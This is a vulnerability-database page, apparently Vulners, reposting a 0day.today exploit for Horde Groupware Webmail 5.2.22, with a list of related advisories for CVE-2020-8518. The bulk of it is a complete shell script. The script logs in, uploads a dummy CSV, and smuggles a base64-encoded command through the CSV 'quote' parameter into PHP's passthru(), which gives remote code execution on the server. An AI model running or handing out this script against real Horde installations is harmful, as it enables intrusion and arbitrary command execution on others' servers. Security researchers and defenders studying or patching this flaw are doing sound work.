Lucene search
K

Horde Groupware Webmail Edition 5.2.22 - Remote Code Execution Exploit

🗓️ 15 Mar 2020 00:00:00Reported by Andrea CardaciType 
zdt
 zdt
🔗 0day.today👁 841 Views

Horde Groupware Webmail 5.2.22 RCE Exploi

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Horde 5.2.22 CSV Import Code Execution Exploit
23 Mar 202000:00
zdt
Circl
CVE-2020-8518
23 Mar 202012:42
circl
Check Point Advisories
Horde Groupware Remote Code Execution (CVE-2020-8518)
3 Jun 202000:00
checkpoint_advisories
CVE
CVE-2020-8518
17 Feb 202014:53
cve
Cvelist
CVE-2020-8518
17 Feb 202014:53
cvelist
Debian
[SECURITY] [DLA 2174-1] php-horde-data security update
15 Apr 202003:02
debian
Debian CVE
CVE-2020-8518
17 Feb 202014:53
debiancve
Tenable Nessus
Debian DLA-2174-1 : php-horde-data security update
15 Apr 202000:00
nessus
Tenable Nessus
Fedora 30 : php-horde-Horde-Data (2020-0248ad925e)
14 Feb 202000:00
nessus
Tenable Nessus
Fedora 31 : php-horde-Horde-Data (2020-1e7cc91d55)
14 Feb 202000:00
nessus
Rows per page
#!/bin/sh

if [ "$#" -ne 4 ]; then
    echo '[!] Usage: <url> <username> <password> <command>' 1>&2
    exit 1
fi

BASE="$1"
USERNAME="$2"
PASSWORD="$3"
COMMAND="$4"

JAR="$(mktemp)"
trap 'rm -f "$JAR"' EXIT

echo "[+] Logging in as $USERNAME:$PASSWORD" 1>&2
curl -si -c "$JAR" "$BASE/login.php" \
    -d 'login_post=1' \
    -d "horde_user=$USERNAME" \
    -d "horde_pass=$PASSWORD" | grep -q 'Location: /services/portal/' || \
    echo '[!] Cannot log in' 1>&2

echo "[+] Uploading dummy file" 1>&2
echo x | curl -si -b "$JAR" "$BASE/mnemo/data.php" \
    -F 'actionID=11' \
    -F 'import_step=1' \
    -F 'import_format=csv' \
    -F 'notepad_target=x' \
    -F '[email protected];filename=x' \
    -so /dev/null

echo "[+] Running command" 1>&2
BASE64_COMMAND="$(echo -n "$COMMAND 2>&1" | base64 -w0)"
curl -b "$JAR" "$BASE/mnemo/data.php" \
    -d 'actionID=3' \
    -d 'import_step=2' \
    -d 'import_format=csv' \
    -d 'header=1' \
    -d 'fields=1' \
    -d 'sep=x' \
    --data-urlencode "quote=).passthru(base64_decode(\"$BASE64_COMMAND\")).die();}//\\"

#  0day.today [2020-03-15]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Mar 2020 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.84857
841